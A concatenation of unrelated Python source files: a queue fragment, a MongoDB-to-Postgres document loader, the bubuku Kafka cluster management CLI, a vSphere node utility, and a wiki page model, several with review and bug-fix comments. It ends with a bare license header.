        return self.queue.pop()

    def peek(self):
        """Return the front item without removing it, or -1 if empty.

        The original returned the entire backing list, which was a bug: a
        peek must expose only the element the next queuePop() would return.
        """
        if not self.queue:
            return -1
        # Front of the queue is the end of the list (see class docstring).
        return self.queue[-1]
|
"""
This file reads the documents with specified values from the MongoDB, and readies them for insertion into the
Postgres schema. This is a separate class, since we want to avoid running it with every try/experimentation over
the 'regular' schema, which could potentially have several reworks. The stored documents, on the other hand,
should be relatively fixed, and not require constant reworks.
Some words on the naming convention: The name from the 'articles' table in MongoDB was renamed to 'documents', since
this is the common phrase used in the paper, as well as the context of 'document collections'.
"""
from MongoConnector import MongoConnector
from PostgresConnector import PostgresConnector
from utils import set_up_logger, check_table_existence
from psycopg2 import ProgrammingError, IntegrityError
from psycopg2.extras import execute_values
import os
import time
import logging
from collections import OrderedDict
class DocumentGenerator:
    """Moves documents from the MongoDB 'articles' collection into a Postgres
    table.

    Typical flow: ``retrieve()`` pulls the selected fields into memory,
    ``push()`` bulk-inserts them; ``clear()`` empties the target table.
    """

    def __init__(self,
                 # NOTE(review): mutable default argument — the OrderedDict is
                 # shared across all instances. It is only read here, so no bug
                 # manifests, but a None-default with in-body construction
                 # would be safer.
                 fields=OrderedDict({"_id":"document_id",
                                     "title":"title",
                                     "feedName":"feedName",
                                     "category":"category",
                                     "feedURL":"feedURL",
                                     "published":"published"
                                     }),
                 num_distinct_documents=0,
                 document_table_name="documents",
                 database="postgres",
                 user="postgres",
                 password="postgres",
                 host="127.0.0.1",
                 port=5435,
                 log_file=os.path.join(os.path.dirname(__file__), "logs/DocumentGenerator.log"),
                 log_level=logging.INFO,
                 log_verbose=True
                 ):
        """
        Initializes context, and sets up documents that will be parsed.
        Also establishes the PostgresConnector that will later be used to push the retrieved documents.
        :param fields: (OrderedDict) Key-value pairs that indicate a mapping of fields that should be retrieved (key),
               and the respective field it should be called in the SQL table. Ordered because SQL tables are.
        :param num_distinct_documents: (int) As the name indicates, the number of distinct articles that should be used.
               Mainly for debugging purposes. 0 means all documents will be used, in accordance with MongoDB standards.
        :param document_table_name: (str) Name of the Postgres table that should contain the documents
        :param database: (str) database name.
        :param user: (str) User name to get access to the Postgres database.
        :param password: (str) Corresponding user password.
        :param host: (IP) IP address (in string format) for the host of the postgres database.
        :param port: (integer) Port at which to access the database.
        :param log_file: (os.path) Path to the file containing the logs.
        :param log_level: (logging.LEVEL) Specifies the level to be logged.
        :param log_verbose: (boolean) Specifies whether or not to look to stdout as well.
        """
        # set up logger
        self.logger = set_up_logger(__name__, log_file, log_level, log_verbose)
        self.logger.info("Successfully registered logger to DocumentGenerator.")
        # register a MongoConnector
        self.mc = MongoConnector()
        self.logger.info("Successfully registered MongoConnector to DocumentGenerator.")
        self.num_distinct_documents = num_distinct_documents
        # get the distinct IDs for the documents so we can match against them later
        if self.num_distinct_documents != 0:
            self.logger.info("Non-zero limit detected. Fetching first N distinct document IDs now...")
            with self.mc as open_mc:
                documents = open_mc.client[open_mc.news].articles
                self.first_documents = list(documents.find().limit(self.num_distinct_documents))
                # for small enough number, and large enough document collection, this is more efficient:
                self.first_documents = [el["_id"] for el in self.first_documents]
                self.logger.info("Successfully registered relevant document IDs.")
        else:
            # needed to avoid later conflicts
            self.first_documents = []
        # set up PostgresConnector. Since we only use these once, I don't see any reason to store the connection
        # details locally again.
        self.pc = PostgresConnector(database, user, password, host, port)
        self.logger.info("Successfully registered PostgresConnector to DocumentGenerator.")
        # format them into a reasonable format
        self.fields = fields
        if not self.fields:
            self.logger.error("No fields for MongoDB table specified!")
        # MongoDB projection dict: 1 marks a field for inclusion.
        self.values_to_retrieve = {key: 1 for key in self.fields.keys()}
        # suppress _id if not wanted, as it is returned by default.
        if "_id" not in self.values_to_retrieve.keys():
            self.values_to_retrieve["_id"] = 0
        # TODO: clarify whether quoting/escaping of column names is needed here.
        # Comma-separated SQL column list used by push()'s INSERT statement.
        self.sql_format = ", ".join([value for value in self.fields.values()])
        self.document_table_name = document_table_name
        # preparation for later. According to PEP8
        self.data = []
        self.logger.info("Successfully set up DocumentGenerator.")

    def retrieve(self):
        """
        Get values from MongoDB ready for offline processing, and later insertion. So far the software pattern for
        the insertion into Postgres is unclear, but will likely also be done in that class. Hopefully the design of the
        PostgresConnector holds up so that we do not have to duplicate several elements.
        :return: (None) Internally generates the value tuples required for insertion into Postgres.
        """
        self.logger.info("Starting to retrieve documents from MongoDB...")
        start_time = time.time()
        with self.mc as open_mc:
            documents = open_mc.client[open_mc.news].articles
            if self.first_documents:
                # limit was set in __init__: only fetch the pre-selected IDs
                self.data = list(documents.find({"_id": {"$in": self.first_documents}}, self.values_to_retrieve))
            else:
                # self.first_documents will be empty if no limit is specified!
                self.data = list(documents.find({}, self.values_to_retrieve))
            # get out of dictionary key structure:
            self.data = [list(el.values()) for el in self.data]
        end_time = time.time()
        self.logger.info("Successfully retrieved relevant documents in {:.4f} s.".format(end_time - start_time))

    def push(self):
        """
        Pushes a previously collected series of documents from the local store to a Postgres table, as per the defined
        schema. This should also check that the documents have been actually retrieved before.
        :return: (None) Fills up the (remote) postgres table.
        """
        self.logger.info("Starting to push values into the Postgres table...")
        if not self.data:
            self.logger.error("No data found to be pushed! Please call .retrieve() first!")
            return 0
        with self.pc as open_pc:
            if not check_table_existence(self.logger, open_pc, self.document_table_name):
                return 0
            self.logger.info("Found document table.")
            self.logger.info("Inserting values.")
            # build query
            start_time = time.time()
            try:
                # NOTE(review): table/column names are interpolated via
                # str.format — acceptable only because they come from the
                # constructor, not from untrusted input.
                execute_values(open_pc.cursor,
                               "INSERT INTO {} ({}) VALUES %s".format(self.document_table_name, self.sql_format),
                               self.data)
                end_time = time.time()
                self.logger.info("Successfully inserted values in {:.4f} s".format(end_time - start_time))
            except IntegrityError as err:
                self.logger.error("Values with previously inserted primary key detected!\n {}".format(err))
                return 0

    def clear(self):
        """
        Deletes previously inserted documents from the table.
        :return: (None). Calls Postgres table with prepared DELETE-statement.
        """
        with self.pc as open_pc:
            if not check_table_existence(self.logger, open_pc, self.document_table_name):
                return 0
            self.logger.info("Found document table.")
            self.logger.info("Deleting all previously inserted documents...")
            open_pc.cursor.execute("DELETE FROM {}".format(self.document_table_name))
            # TODO: Check whether document count is actually 0!
            self.logger.info("Successfully deleted all previously inserted documents.")

    def remove_spike(self):
        """
        Manual deletion of the exceptionally high volume on the two dates of 18th and 28th of August 2016.
        :return: (None)
        """
        with self.pc as open_pc:
            if not check_table_existence(self.logger, open_pc, self.document_table_name):
                return 0
            self.logger.info("Found document table.")
            start = time.time()
            self.logger.info("Deleting all previously inserted documents...")
            # Hard-coded windows around the known ingestion spikes on
            # 2016-08-18 and 2016-08-28, restricted to the 'WP' feed.
            open_pc.cursor.execute("DELETE FROM {} " \
                                   "WHERE ((published >= '2016-08-18 10:00:00' AND published < '2016-08-18 12:00:00') "
                                   "OR (published >= '2016-08-28 10:00:00' AND published < '2016-08-28 12:00:00') "
                                   "OR (published >= '2016-08-18 14:00:00' AND published < '2016-08-18 17:00:00') "
                                   "OR (published >= '2016-08-28 14:00:00' AND published < '2016-08-28 17:00:00')) "
                                   "AND feedName = 'WP'".format(self.document_table_name))
            end = time.time()
            self.logger.info("Successfully deleted all documents during the peak time in {:.4f} s.".format(end-start))
if __name__ == "__main__":
    # Ad-hoc smoke test: fetch documents, show the first one, then reset the
    # Postgres table and repopulate it.
    generator = DocumentGenerator()
    generator.retrieve()
    print(generator.data[0])
    generator.clear()
    generator.push()
|
#!/usr/bin/env python3
import json
import logging
import sys
import time
import click
import requests
from requests import Response
from bubuku.features.remote_exec import RemoteCommandExecutorCheck
from bubuku.utils import get_opt_broker_id, prepare_configs, is_cluster_healthy, get_max_bytes_in
from bubuku.zookeeper import load_exhibitor_proxy, BukuExhibitor, RebalanceThrottleManager
_LOG = logging.getLogger('bubuku.cli')
def _print_table(table: list, print_function=None):
    """Pretty-print a list of dicts as an aligned text table.

    Column order is the sorted union of all keys across rows; each column is
    padded to the widest of its header and its values. Missing cells render
    as empty strings.

    :param table: list of dicts (rows)
    :param print_function: optional sink for each rendered line (default: print)
    """
    printer = print_function or print
    names = sorted({key for row in table for key in row.keys()})
    # Column width = max of header length and the longest stringified value.
    widths = {name: len(name) for name in names}
    for row in table:
        for key, value in row.items():
            widths[key] = max(widths[key], len(str(value)))
    row_format = ' '.join('{!s:' + str(widths[name]) + 's}' for name in names)
    printer(row_format.format(*names))
    for row in table:
        printer(row_format.format(*[row.get(name, '') for name in names]))
def __validate_not_empty(ctx, param, value):
    """Click option callback that rejects empty values and passes through
    everything else unchanged."""
    if value:
        return value
    raise click.BadParameter('Parameter must have value')
def __check_all_broker_ids_exist(broker_ids: list, zk: BukuExhibitor):
    """Raise an Exception if any of ``broker_ids`` is not currently
    registered in zookeeper; the message lists the offending ids."""
    known = zk.get_broker_ids()
    invalid = [candidate for candidate in broker_ids if candidate not in known]
    if not invalid:
        return
    if len(invalid) == 1:
        raise Exception('1 broker id is not valid: {}'.format(invalid[0]))
    raise Exception('{} broker ids are not valid: {}'.format(len(invalid), ",".join(invalid)))
logging.basicConfig(level=getattr(logging, 'INFO', None))
# Root click command group. Intentionally documented with comments rather
# than a docstring: click would otherwise use the docstring as the group's
# help text. Prints the Bubuku banner to stderr so piped stdout stays clean.
@click.group()
def cli():
    logo = """
        ____        __          __
       / __ )__  __/ /_  __  __/ /____  __
      / __  / / / / __ \/ / / / //_/ / / /
     / /_/ / /_/ / /_/ / /_/ / ,< / /_/ /
    /_____/\__,_/_.___/\__,_/_/|_|\__,_/
    """
    sys.stderr.write(logo + "\nStart, monitor and rebalance kafka cluster in AWS setup\n")
def _dump_replica_assignment_as_json(assignment: list) -> str:
    """Serialize (topic, partition) pairs into the compact JSON document that
    kafka expects for a preferred replica election."""
    partitions = [{'topic': pair[0], 'partition': int(pair[1])} for pair in assignment]
    document = {
        "version": 1,
        "partitions": partitions
    }
    return json.dumps(document, separators=(',', ':'))
@cli.command('preferred-replica-election',
             help='Do preferred replica election, as command line tool from kafka have a number of limitations. '
                  'Only partitions, that are improperly allocated will be affected. In case if size of resulting json '
                  'is too big, it will be split into several parts, and they will be executed one after another.')
@click.option('--dry-run', is_flag=True, help="Do not apply the changes. Instead just prepare json file(s)")
@click.option('--max-json-size', type=click.INT, default=512000,
              help="Maximum size of json data in bytes to write to zk", show_default=True)
def trigger_preferred_replica_election(dry_run: bool, max_json_size: int):
    # Find every partition whose current leader is not the preferred (first)
    # replica and trigger a preferred replica election for them via zookeeper,
    # splitting the payload into halves until it fits under max_json_size.
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        # Snapshot the current state of every partition.
        partitions_state = {}
        for topic, partition, state in zookeeper.load_partition_states():
            partitions_state[(topic, partition)] = state
        wrong_assignment = []
        for topic, partition, replica_list in zookeeper.load_partition_assignment():
            key = (topic, partition)
            if not replica_list:
                _LOG.warning('Replica list is not defined for %s', key)
                continue
            if key not in partitions_state:
                _LOG.warning("Topic partition %s is not found in active states list. will skip it", key)
                continue
            leader = partitions_state[key].get('leader')
            if leader is None:
                # BUG FIX: the original message had no placeholder or argument
                # and logged a truncated sentence; include the partition key.
                _LOG.warning('Current leader is not defined for %s', key)
                continue
            expected_leader = replica_list[0]
            if leader != expected_leader:
                _LOG.info("Found incorrect assignment: %s, leader is %d, but should be the first one in %s",
                          key, leader, replica_list)
                wrong_assignment.append(key)
        if dry_run:
            print(_dump_replica_assignment_as_json(wrong_assignment))
        else:
            while wrong_assignment:
                items_to_take = len(wrong_assignment)
                change_applied = False
                while not change_applied:
                    payload = _dump_replica_assignment_as_json(wrong_assignment[:items_to_take])
                    payload_bytes = payload.encode('utf-8')
                    if len(payload_bytes) > max_json_size:
                        # Payload too large for zk: halve the batch and retry.
                        new_items_to_take = int(items_to_take / 2)
                        _LOG.info("Not fitting to %d bytes with %d items, will try %d items",
                                  max_json_size, items_to_take, new_items_to_take)
                        items_to_take = new_items_to_take
                        if items_to_take <= 0:
                            _LOG.error("Incorrect configuration - even one key is not fitting to proposed size %d. "
                                       "Stop playing and do the job!", max_json_size)
                            exit(1)
                        continue
                    _LOG.info("Applying %s", payload)
                    zookeeper.exhibitor.create('/admin/preferred_replica_election', payload_bytes)
                    # Kafka deletes the node once the election is processed.
                    while zookeeper.exhibitor.is_node_present('/admin/preferred_replica_election'):
                        _LOG.info("Waiting for node to disappear")
                        time.sleep(1)
                    change_applied = True
                del wrong_assignment[:items_to_take]
        _LOG.info("Done with assignment")
@cli.command('restart', help='Restart kafka instance')
@click.option('--broker', type=click.STRING,
              help='Broker id to restart. By default current broker id is restarted')
def restart_broker(broker: str):
    # Register a restart command in zookeeper for the given (or, when --broker
    # is omitted, the current) broker; it is picked up and executed remotely.
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        broker_id = get_opt_broker_id(broker, config, zookeeper, env_provider)
        RemoteCommandExecutorCheck.register_restart(zookeeper, broker_id)
@cli.command('rolling-restart', help='Rolling restart of Kafka cluster')
@click.option('--image-tag', type=click.STRING, help='Docker image to run Kafka broker')
@click.option('--instance-type', type=click.STRING, required=True, help='AWS instance type to run Kafka broker on')
@click.option('--scalyr-key', type=click.STRING, help='Scalyr account key')
@click.option('--scalyr-region', type=click.STRING, help='Scalyr region to use')
@click.option('--kms-key-id', type=click.STRING, help='Kms key id to decrypt data with')
@click.option('--cool-down', type=click.INT, default=600, show_default=True,
              help='Number of seconds to wait before passing the restart task to another broker, after cluster is '
                   'stable. Default value of 10 minutes is recommended for production in order to give consumers '
                   'enough time to stabilize in between restarts. This is particularly important for KStream '
                   'applications')
def rolling_restart_broker(image_tag: str, instance_type: str, scalyr_key: str, scalyr_region: str, kms_key_id: str,
                           cool_down: int):
    # Refuse to start a rolling restart on an unhealthy cluster; the restart
    # task is then registered on the current broker and handed on from there.
    if not is_cluster_healthy():
        print('Cluster is not healthy, try again later :)')
        return
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        broker_id = get_opt_broker_id(None, config, zookeeper, env_provider)
        RemoteCommandExecutorCheck.register_rolling_restart(zookeeper, broker_id, image_tag, instance_type, scalyr_key,
                                                            scalyr_region, kms_key_id, cool_down)
@cli.command('rebalance', help='Run rebalance process on one of brokers. If rack-awareness is enabled, replicas will '
                               'only be move to other brokers in the same rack')
@click.option('--broker', type=click.STRING,
              help="Broker instance on which to perform rebalance. By default, any free broker will start it")
@click.option('--empty_brokers', type=click.STRING,
              help="Comma-separated list of brokers to empty. All partitions will be moved to other brokers")
@click.option('--exclude_topics', type=click.STRING, help="Comma-separated list of topics to exclude from rebalance")
@click.option('--bin-packing', is_flag=True, help="Use bean packing approach instead of one way processing")
@click.option('--parallelism', type=click.INT, default=1, show_default=True,
              help="Amount of partitions to move in a single rebalance step")
@click.option('--throttle', type=click.INT, default=100000000, help="Upper bound on bandwidth (in bytes/sec) used for "
                                                                    "rebalance")
@click.option('--remove-throttle', is_flag=True, help="Don't trigger rebalance but remove throttling "
                                                      "configuration from all the brokers and topics")
def rebalance_partitions(broker: str, empty_brokers: str, exclude_topics: str, parallelism: int, bin_packing: bool,
                         throttle: int, remove_throttle: bool):
    # A throttle below the cluster's max BytesIn would stall replication, so
    # validate it up front and bail out with a non-zero exit code.
    if throttle and throttle < get_max_bytes_in():
        print('Throttle value must be set above the max BytesIn for the replication to progress. '
              'The current max BytesIn is {}'.format(get_max_bytes_in()))
        exit(1)
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        if remove_throttle:
            # --remove-throttle short-circuits: only clean up configuration.
            return RebalanceThrottleManager.remove_all_throttle_configurations(zookeeper)
        empty_brokers_list = [] if empty_brokers is None else empty_brokers.split(',')
        exclude_topics_list = [] if exclude_topics is None else exclude_topics.split(',')
        __check_all_broker_ids_exist(empty_brokers_list, zookeeper)
        # Without --broker, any free broker may pick the task up (broker_id None).
        broker_id = get_opt_broker_id(broker, config, zookeeper, env_provider) if broker else None
        RemoteCommandExecutorCheck.register_rebalance(zookeeper, broker_id, empty_brokers_list,
                                                      exclude_topics_list, parallelism, bin_packing, throttle)
@cli.command('migrate', help='Replace one broker with another for all partitions')
@click.option('--from', 'from_', type=click.STRING, callback=__validate_not_empty,
              help='List of brokers to migrate from (separated with ",")')
@click.option('--to', type=click.STRING, callback=__validate_not_empty,
              help='List of brokers to migrate to (separated with ",")')
@click.option('--shrink', is_flag=True, default=False, show_default=True,
              help='Whether or not to shrink replaced broker ids form partition assignment')
@click.option('--broker', type=click.STRING, help='Optional broker id to execute check on')
@click.option('--throttle', type=click.INT, default=100000000, help="Upper bound on bandwidth (in bytes/sec) used for "
                                                                    "reassigning partitions")
@click.option('--parallelism', type=click.INT, show_default=True, default=1,
              help="Amount of partitions to move in a single migration step")
@click.option('--remove-throttle', is_flag=True, help="Don't trigger rebalance but remove throttling "
                                                      "configuration from all the brokers and topics")
def migrate_broker(from_: str, to: str, shrink: bool, broker: str, throttle: int, parallelism: int,
                   remove_throttle: bool):
    """Register a broker migration action that moves all partitions from the
    `--from` brokers onto the `--to` brokers."""
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        # Throttle removal is a standalone operation; nothing else to do.
        if remove_throttle:
            return RebalanceThrottleManager.remove_all_throttle_configurations(zookeeper)
        source_brokers = from_.split(',')
        target_brokers = to.split(',')
        broker_id = None
        if broker:
            broker_id = get_opt_broker_id(broker, config, zookeeper, env_provider)
        RemoteCommandExecutorCheck.register_migration(
            zookeeper, source_brokers, target_brokers, shrink, broker_id, throttle, parallelism)
@cli.command('swap_fat_slim', help='Move one partition from fat broker to slim one')
@click.option('--threshold', type=click.INT, default=100000, show_default=True, help="Threshold in kb to run swap")
def swap_partitions(threshold: int):
    """Register a 'fatboy slim' action that moves one partition from the most
    loaded (fat) broker to the least loaded (slim) one.

    The previous default was the string "100000" for a click.INT option; the
    integer literal is used instead so the default matches the declared type.
    """
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        RemoteCommandExecutorCheck.register_fatboy_slim(zookeeper, threshold_kb=threshold)
@cli.group(name='actions', help='Work with running actions')
def actions():
    """Container group for the 'actions' subcommands (list/delete); no work
    happens here, click only uses it for dispatch."""
    pass
@actions.command('list', help='List all the actions on broker(s)')
@click.option('--broker', type=click.STRING,
              help='Broker id to list actions on. By default all brokers are enumerated')
def list_actions(broker: str):
    """Query each broker's controller queue over HTTP and print the pending
    actions as a table. Brokers that cannot be reached are logged and skipped.
    """
    table = []
    config, env_provider = prepare_configs()
    for broker_id, address in _list_broker_addresses(config, env_provider, broker):
        try:
            # A timeout is mandatory here: without one a single unresponsive
            # broker would block the whole CLI indefinitely.
            response = requests.get('http://{}:{}/api/controller/queue'.format(address, config.health_port),
                                    timeout=15)
        except Exception as e:
            print('Failed to query information on {} ({})'.format(broker_id, address))
            _LOG.error('Failed to query information on {} ({})'.format(broker_id, address), exc_info=e)
            continue
        line = {
            '_broker_id': broker_id,
            '_broker_address': address,
        }
        if response.status_code != 200:
            line['error'] = _extract_error(response)
            table.append(line)
        else:
            changes = response.json()
            if not changes:
                # Emit an empty row so the broker still shows up in the table.
                line.update({
                    'type': None,
                    'description': None,
                    'running': None
                })
                table.append(line)
            else:
                # One row per queued action, each carrying the broker columns.
                for change in changes:
                    line_copy = dict(line)
                    line_copy.update(change)
                    table.append(line_copy)
    if not table:
        print('No brokers found')
    else:
        _print_table(table)
@actions.command('delete', help='Remove all actions of specified type on broker(s)')
@click.option('--action', type=click.STRING,
              help='Action to delete')
@click.option('--broker', type=click.STRING,
              help='Broker id to delete actions on. By default actions are deleted on all brokers')
def delete_actions(action: str, broker: str):
    """Delete all queued actions of type `action` on the selected broker(s)."""
    if not action:
        print('No action specified. Please specify it')
        # BUG FIX: previously execution fell through and issued a DELETE for
        # ".../queue/None" on every broker. Stop here instead.
        return
    config, env_provider = prepare_configs()
    for broker_id, address in _list_broker_addresses(config, env_provider, broker):
        try:
            response = requests.delete(
                'http://{}:{}/api/controller/queue/{}'.format(address, config.health_port, action))
        except Exception as e:
            print('Failed to query information on {} ({})'.format(broker_id, address))
            _LOG.error('Failed to query information on {} ({})'.format(broker_id, address), exc_info=e)
            continue
        if response.status_code not in (200, 204):
            # BUG FIX: report the broker we actually contacted (broker_id);
            # `broker` is the optional CLI filter and may be None.
            print('Failed to delete action from {} ({}): {}'.format(broker_id, address, _extract_error(response)))
        else:
            print('Removed action {} from {} ({})'.format(action, broker_id, address))
def _extract_error(response: Response):
    """Extract a human-readable error message from an HTTP response.

    Prefers the JSON body's 'message' field; falls back to the raw body text
    when the body is not JSON (or has no such field).
    """
    try:
        return response.json()['message']
    except Exception as e:
        _LOG.error('Failed to parse response message', exc_info=e)
        # BUG FIX: requests' Response.text is a property, not a method --
        # `response.text()` raised "TypeError: 'str' object is not callable".
        return response.text
def _list_broker_addresses(config, env_provider, broker):
    """Yield ``(broker_id, address)`` pairs for the cluster's brokers.

    When `broker` is a non-empty id, only that broker is yielded.
    """
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        for candidate in zookeeper.get_broker_ids():
            if not broker or broker == candidate:
                yield candidate, zookeeper.get_broker_address(candidate)
@cli.command('stats', help='Display statistics about brokers')
def show_stats():
    """Print a table with per-broker address and free/used disk space."""
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        disk_stats = zookeeper.get_disk_stats()
        table = []
        for broker_id in zookeeper.get_broker_ids():
            # BUG FIX: .get('disk') returns None when the broker entry exists
            # but has no 'disk' key, which crashed on disk.get() below.
            # `or {}` keeps the row printable with empty values instead.
            disk = (disk_stats.get(broker_id, {}).get('disk') or {}) if disk_stats else {}
            table.append({
                'Broker Id': broker_id,
                'Address': zookeeper.get_broker_address(broker_id),
                'Free kb': disk.get('free_kb'),
                'Used kb': disk.get('used_kb')
            })
        _print_table(table)
@cli.group(name='validate', help='Validates internal structures of kafka/zk')
def validate():
    """Container group for the 'validate' subcommands; click uses it only for
    dispatch, no work happens here."""
    pass
@validate.command('replication', help='Returns all partitions whose ISR size differs from the replication factor or '
                                      'have not registered broker ids')
@click.option('--factor', type=click.INT, default=3, show_default=True, help='Replication factor')
def validate_replication(factor: int):
    """Print every partition whose in-sync replica set is the wrong size or
    references brokers that are not currently registered in zookeeper."""
    config, env_provider = prepare_configs()
    with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
        registered = {int(b) for b in zookeeper.get_broker_ids()}
        problems = []
        for topic_name, partition, state in zookeeper.load_partition_states():
            isr = state['isr']
            # A healthy partition has exactly `factor` replicas, all of which
            # are registered brokers.
            if len(isr) == factor and set(isr).issubset(registered):
                continue
            problems.append({
                'Partition': partition,
                'Topic': topic_name,
                'State': state
            })
        if problems:
            _LOG.info('Invalid topics:')
            _print_table(problems)
        else:
            print('All replica lists look valid')
# Script entry point: dispatch to the click command group.
if __name__ == '__main__':
    cli()
|
#
# Copyright (c) 2016 Nutanix Inc. All rights reserved.
#
from curie.node_util import NodeUtil
class GenericVsphereNodeUtil(NodeUtil):
    """Node utility handler for generic (non-Nutanix) nodes that are managed
    by a vCenter management server."""

    @classmethod
    def _use_handler(cls, node):
        """Returns True if 'node' should use this class as its handler."""
        metadata = node.cluster().metadata()
        is_generic = metadata.cluster_software_info.HasField("generic_info")
        via_vcenter = metadata.cluster_management_server_info.HasField("vcenter_info")
        return is_generic and via_vcenter

    def __init__(self, node):
        self.__node = node
        self.__cluster_metadata = self.__node.cluster().metadata()
        self.__vcenter_info = \
            self.__cluster_metadata.cluster_management_server_info.vcenter_info

    def is_ready(self):
        """See 'NodeUtil.is_ready' documentation for further details.

        For a generic vSphere node, check only that vCenter reports the node
        is powered on.
        """
        # Don't sync with oob, as this method is often polled.
        return self.__node.is_powered_on_soft(sync_with_oob=False)
|
# -*- coding: utf-8 -*-
import datetime
import functools
import logging
from bleach import linkify
from bleach.callbacks import nofollow
import markdown
from markdown.extensions import codehilite, fenced_code, wikilinks
from modularodm import fields
from framework.forms.utils import sanitize
from framework.guid.model import GuidStoredObject
from website import settings
from website.addons.base import AddonNodeSettingsBase
from website.addons.wiki import utils as wiki_utils
from website.addons.wiki.settings import WIKI_CHANGE_DATE
from website.project.model import write_permissions_revoked
from .exceptions import (
NameEmptyError,
NameInvalidError,
NameMaximumLengthError,
)
logger = logging.getLogger(__name__)
class AddonWikiNodeSettings(AddonNodeSettingsBase):
    """Per-node settings for the wiki addon."""

    def after_register(self, node, registration, user, save=True):
        """Copy wiki settings to registrations."""
        settings_clone = self.clone()
        settings_clone.owner = registration
        if save:
            settings_clone.save()
        return settings_clone, None

    def to_json(self, user):
        # The wiki addon exposes no configurable settings to the UI.
        return {}
@write_permissions_revoked.connect
def subscribe_on_write_permissions_revoked(node):
    """Signal handler: when write permissions are revoked on a node, migrate
    the sharejs UUID of every private wiki page on it."""
    for page_name in node.wiki_private_uuids:
        wiki_utils.migrate_uuid(node, page_name)
def build_wiki_url(node, label, base, end):
    # `base` and `end` are unused but required by the markdown wikilinks
    # extension's build_url callback signature (see render_content below,
    # which binds `node` via functools.partial).
    return node.web_url_for('project_wiki_view', wname=label)
def validate_page_name(value):
    """Validate a wiki page name.

    The name is stripped of surrounding whitespace before validation.

    :param value: proposed page name (may be None).
    :return: True when the name is valid.
    :raises NameEmptyError: if the stripped name is empty.
    :raises NameInvalidError: if the name contains a forward slash.
    :raises NameMaximumLengthError: if the name exceeds 100 characters.
    """
    value = (value or '').strip()
    if not value:
        raise NameEmptyError('Page name cannot be blank.')
    # Idiomatic membership test instead of value.find('/') != -1.
    if '/' in value:
        raise NameInvalidError('Page name cannot contain forward slashes.')
    if len(value) > 100:
        raise NameMaximumLengthError('Page name cannot be greater than 100 characters.')
    return True
def render_content(content, node):
    """Render wiki markdown to sanitized HTML.

    Supports wikilinks (resolved to project wiki URLs for `node`), fenced
    code blocks, and code highlighting.
    """
    html_output = markdown.markdown(
        content,
        extensions=[
            wikilinks.WikiLinkExtension(
                configs=[
                    ('base_url', ''),
                    ('end_url', ''),
                    # Bind the node so wikilink labels resolve to its wiki pages.
                    ('build_url', functools.partial(build_wiki_url, node))
                ]
            ),
            fenced_code.FencedCodeExtension(),
            codehilite.CodeHiliteExtension(
                [('css_class', 'highlight')]
            )
        ]
    )

    # Sanitize the rendered HTML against the wiki whitelist. linkify gets
    # called after sanitize (see NodeWikiPage.html), because we're adding
    # rel="nofollow" to <a> elements - but don't want to allow them for
    # other elements.
    sanitized_content = sanitize(html_output, **settings.WIKI_WHITELIST)
    return sanitized_content
class NodeWikiPage(GuidStoredObject):
    """A stored version of a wiki page attached to a node.

    Each save of a wiki page is a separate NodeWikiPage document; `version`
    and `is_current` track the revision history.
    """

    _id = fields.StringField(primary=True)
    # Validated on assignment via validate_page_name (no slashes, <= 100 chars).
    page_name = fields.StringField(validate=validate_page_name)
    version = fields.IntegerField()
    date = fields.DateTimeField(auto_now_add=datetime.datetime.utcnow)
    is_current = fields.BooleanField()
    content = fields.StringField(default='')
    user = fields.ForeignField('user')
    node = fields.ForeignField('node')

    @property
    def deep_url(self):
        """Deep (API-style) URL of this page under its node."""
        return '{}wiki/{}/'.format(self.node.deep_url, self.page_name)

    @property
    def url(self):
        """Web URL of this page under its node."""
        return '{}wiki/{}/'.format(self.node.url, self.page_name)

    @property
    def rendered_before_update(self):
        """True if this revision predates the wiki rendering change date."""
        return self.date < WIKI_CHANGE_DATE

    def html(self, node):
        """The cleaned HTML of the page"""
        sanitized_content = render_content(self.content, node=node)
        try:
            return linkify(
                sanitized_content,
                [nofollow, ],
            )
        except TypeError:
            # linkify can choke on some inputs; fall back to the sanitized
            # (but unlinkified) HTML rather than failing the page render.
            logger.warning('Returning unlinkified content.')
            return sanitized_content

    def raw_text(self, node):
        """ The raw text of the page, suitable for using in a test search"""
        return sanitize(self.html(node), tags=[], strip=True)

    def get_draft(self, node):
        """
        Return most recently edited version of wiki, whether that is the
        last saved version or the most recent sharejs draft.
        """
        db = wiki_utils.share_db()
        sharejs_uuid = wiki_utils.get_sharejs_uuid(node, self.page_name)

        doc_item = db['docs'].find_one({'_id': sharejs_uuid})
        if doc_item:
            sharejs_version = doc_item['_v']
            sharejs_timestamp = doc_item['_m']['mtime']
            # sharejs mtime appears to be in milliseconds; convert to seconds
            # for utcfromtimestamp. TODO(review): confirm against sharejs docs.
            sharejs_timestamp /= 1000   # Convert to appropriate units
            sharejs_date = datetime.datetime.utcfromtimestamp(sharejs_timestamp)

            # Version 1 is the initial empty doc; only prefer the draft when
            # it is both non-trivial and newer than the last saved revision.
            if sharejs_version > 1 and sharejs_date > self.date:
                return doc_item['_data']

        return self.content

    def save(self, *args, **kwargs):
        """Save the page and refresh the node's search index."""
        rv = super(NodeWikiPage, self).save(*args, **kwargs)
        if self.node:
            self.node.update_search()
        return rv

    def rename(self, new_name, save=True):
        """Rename the page; `new_name` is validated by the field validator."""
        self.page_name = new_name
        if save:
            self.save()

    def to_json(self):
        return {}
|
# Copyright 2019 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
